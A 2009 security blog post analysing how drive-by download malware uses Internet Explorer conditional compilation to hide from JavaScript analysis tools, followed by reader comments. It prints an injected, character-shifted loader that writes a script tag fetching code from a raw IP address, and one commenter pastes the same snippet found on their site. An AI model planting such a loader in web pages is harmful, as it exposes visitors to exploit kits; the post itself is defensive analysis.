marco
blog
Menu:
JavaScript anti-analysis tricks: IE conditional compilation
May 6, 2009
An anti-analysis/fingerprinting trick I've noticed more and more frequently in drive-by downloads is the use of IE conditional compilation.
Conditional compilation is a feature of Internet Explorer that enables the browser to control the compilation of a script (that is, to include or exclude code to be interpreted) depending on the values of a number of conditional compilation variables. Predefined variables provide information about the client environment, such as its processor, OS, and JavaScript version. Conditional compilation statements are typically contained in regular JavaScript comments to prevent problems with browsers that do not support this feature.
Here is an example of how conditional compilation is used in drive-by downloads:
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +
"/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
var result = "";
for(var i=0;i<source.length;i++)
result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
The cc_on statement enables conditional compilation. The @if
statement checks that the browser is running on a Win32 system. If this
is the case, then the following JavaScript block is interpreted,
otherwise it is simply ignored. The code block is a
classic deobfuscation routine that produces the following text:
<script type="text/javascript"
src="http://95.129.144.229/stats/stats.js"></script>
This script tag fetches a script that redirects to a number of pages serving
exploits.
What happens if the user's browser does not support conditional compilation, for example, it is an analysis tool based on the stock SpiderMonkey or Rhino engines? Then, it will simply consider the entire conditional compilation section a comment and it will skip it. As a consequence, the malicious script tag will not be added to the page, and, therefore, the subsequent exploits will not be launched and will not be detected by the analysis tool.
The full report for the example is available on Wepawet.
To leave a comment, complete the form below. Mandatory fields are marked *.
How can you help me to remove "/@cc_on @/^M /@if (@_win32)^M var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +^M "/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";^M var result = "";^M for(var i=0;i@end @*/^M
". I would like to remove this permanently. I did several times and it keep on
coming back.
I'm a UCSB grad from back in 2004. I graduated with Sociology, but have since gotten into internet marketing, blogging, web development etc. I just started taking courses in programming and coding. We just covered a basic intro to Javascript so I'm finding your posts really interesting.
Do you have any recommendations as to what resources I should read to better my understanding of Javascript? I'm probably at an intermediate level xhtml/html...not a pro by far, but a litter better than a noob :-)
Thanks!
One of the sites I manage was hit by this one. Thanks for the detailed description. I like your blog and plan on following it.